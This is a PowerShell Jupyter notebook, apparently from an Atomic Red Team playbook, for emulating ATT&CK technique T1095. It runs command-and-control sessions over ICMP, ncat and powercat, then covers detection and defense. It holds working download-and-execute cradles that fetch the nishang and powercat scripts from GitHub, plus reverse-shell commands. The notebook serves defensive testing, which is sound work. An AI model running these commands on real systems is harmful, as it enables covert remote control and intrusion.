{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# T1095 - Non-Application Layer Protocol",
    "\n",
    "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Atomic Tests"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "#Import the Module before running the tests.\n# Checkout Jupyter Notebook at https://github.com/haresudhan/TheAtomicPlaybook to run PS scripts.\nImport-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #1 - ICMP C2\nThis will attempt to  start C2 Session Using ICMP. For information on how to set up the listener\nrefer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `powershell`\n```powershell\nIEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')\nInvoke-PowerShellIcmp -IPAddress 127.0.0.1\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1095 -TestNumbers 1"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #2 - Netcat C2\nStart C2 Session Using Ncat\nTo start the listener on a Linux device, type the following: \nnc -l -p <port>\n\n**Supported Platforms:** windows\n#### Dependencies:  Run with `powershell`!\n##### Description: ncat.exe must be available at specified location (#{ncat_exe})\n\n##### Check Prereq Commands:\n```powershell\nif( Test-Path \"$env:TEMP\\T1095\\nmap-7.80\\ncat.exe\") {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -ItemType Directory -Force -Path $env:TEMP\\T1095 | Out-Null\n$parentpath = Split-Path (Split-Path \"$env:TEMP\\T1095\\nmap-7.80\\ncat.exe\"); $zippath = \"$parentpath\\nmap.zip\"\nInvoke-WebRequest  \"https://nmap.org/dist/nmap-7.80-win32.zip\" -OutFile \"$zippath\"\n  Expand-Archive $zippath $parentpath -Force\n  $unzipPath = Join-Path $parentPath \"nmap-7.80\"\nif( $null -eq (Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | ?{$_.DisplayName -like \"Microsoft Visual C++*\"}) ) {\n  Start-Process (Join-Path $unzipPath \"vcredist_x86.exe\")\n}\n\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1095 -TestNumbers 2 -GetPreReqs"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "#### Attack Commands: Run with `powershell`\n```powershell\ncmd /c $env:TEMP\\T1095\\nmap-7.80\\ncat.exe 127.0.0.1 80\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1095 -TestNumbers 2"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #3 - Powercat C2\nStart C2 Session Using Powercat\nTo start the listener on a Linux device, type the following: \nnc -l -p <port>\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `powershell`\n```powershell\nIEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')\npowercat -c 127.0.0.1 -p 80\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1095 -TestNumbers 3"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Detection",
    "\n",
    "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nMonitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Shield Active Defense\n### Behavioral Analytics \n Deploy tools that detect unusual system or user behavior. \n\n Instrument a system to collect detailed information about process execution and user activity, develop a sense of normal or expected behaviors, and alert on abnormal or unexpected activity.  This can be accomplished either onboard the target system or by shipping data to a centralized analysis and alerting system.\n#### Opportunity\nThere is an opportunity to detect the presence of an adversary by identifying and alerting on anomalous behaviors.\n#### Use Case\nA defender can detect the use of non-standard protocols. By implementing behavior analytics specific to a rise in protocol traffic to a system or set of systems, one might be able to detect malicious communications from an adversary.\n#### Procedures\nUse behavioral analytics to detect Living Off The Land Binaries (LOLBins) being used to download and execute a file.\nUse behavioral analytics to identify a system running development tools, but is not used by someone who does development.\nUse behavioral analytics to identify abnormal system processes being used to launch a different process."
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": ".NET (PowerShell)",
   "language": "PowerShell",
   "name": ".net-powershell"
  },
  "language_info": {
   "file_extension": ".ps1",
   "mimetype": "text/x-powershell",
   "name": "PowerShell",
   "pygments_lexer": "powershell",
   "version": "7.0"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 4
}